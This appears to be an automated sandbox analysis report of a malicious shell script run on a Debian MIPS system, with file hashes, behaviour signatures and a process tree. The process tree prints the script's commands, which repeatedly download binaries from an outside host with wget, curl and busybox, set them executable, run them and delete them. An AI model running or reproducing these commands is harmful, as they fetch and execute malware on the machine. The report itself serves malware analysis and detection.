Analysis
-
max time kernel
119s -
max time network
121s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:22
Static task
static1
Behavioral task
behavioral1
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
-
Size
10KB
-
MD5
9b934eb9471f7b80ea070ae4feb86150
-
SHA1
9303ecd0d513c8024a554bf860d73fe5f98cce23
-
SHA256
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e
-
SHA512
e8b3fe4c18b161c588b07657e1609be4c3ad94a1fced10b0c828730ffb4079962bb6d7a1067c57666d9bcab83cbb6795e263783c41f9ab8aecca55f2f6ea4c83
-
SSDEEP
96:YrHTrLtXVtIgNNNNNSVBxLQMs1VZ1Vx1VAVhVlV4/T8hZcL3LlLCakqz6LUY7tNN:k2y1pifn2FXeDiY1pifn23
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 941 chmod 990 chmod 796 chmod 850 chmod 840 chmod 948 chmod 997 chmod 913 chmod 1004 chmod 809 chmod 871 chmod 906 chmod 983 chmod 753 chmod 885 chmod 927 chmod 864 chmod 976 chmod 857 chmod 878 chmod 934 chmod 955 chmod 962 chmod 784 chmod 892 chmod 920 chmod 899 chmod 969 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP 754 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO 785 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo 797 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r 810 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh 841 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 851 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu 858 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo 865 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O 872 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo 879 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh 886 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 893 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq 900 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H 907 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 914 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu 921 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo 928 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O 935 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo 942 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r 949 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh 956 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo 963 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh 970 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 977 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq 984 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H 991 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP 998 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO 1005 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 767 curl 844 curl 867 wget 875 curl 884 busybox 940 busybox 1000 wget 717 wget 945 curl 954 busybox 958 wget 982 busybox 800 curl 924 curl 965 wget 993 wget 790 wget 802 busybox 1003 busybox 903 curl 905 busybox 910 curl 980 curl 987 curl 793 curl 795 busybox 888 wget 933 busybox 986 wget 996 busybox 979 wget 748 busybox 814 wget 861 curl 882 curl 896 curl 912 busybox 959 curl 1001 curl 966 curl 775 busybox 821 curl 853 wget 937 wget 947 busybox 972 wget 989 busybox 917 curl 834 busybox 856 busybox 860 wget 868 curl 874 wget 881 wget 889 curl 973 curl 975 busybox 902 wget 909 wget 742 curl 849 busybox 863 busybox 898 busybox 916 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu curl File opened for modification /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo curl File opened for modification /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 curl File opened for modification /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo curl File opened for modification /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 curl File opened for modification /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r curl File opened for modification /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP curl File opened for modification /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP curl File opened for modification /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 curl File opened for modification /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo curl File opened for modification /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO curl File opened for modification /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo curl File opened for modification /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r curl File opened for modification /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh curl File opened for modification /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H curl File opened for modification /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H curl File opened for modification /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu curl File opened for modification /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO curl File opened for modification /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O curl File opened for modification /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O curl File opened for modification /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo curl File opened for modification /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh curl File opened for modification /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 curl File opened for modification /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh curl File opened for modification /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq curl File opened for modification /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo curl File opened for modification /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh curl File opened for modification /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq curl
Processes
-
/tmp/376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh/tmp/376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:757
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- System Network Configuration Discovery
PID:775
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:790
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:795
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:798
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:799
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- System Network Configuration Discovery
PID:802
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:813
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- System Network Configuration Discovery
PID:814
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:849
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:856
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- System Network Configuration Discovery
PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:870
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- System Network Configuration Discovery
PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:877
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:891
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:919
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:926
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
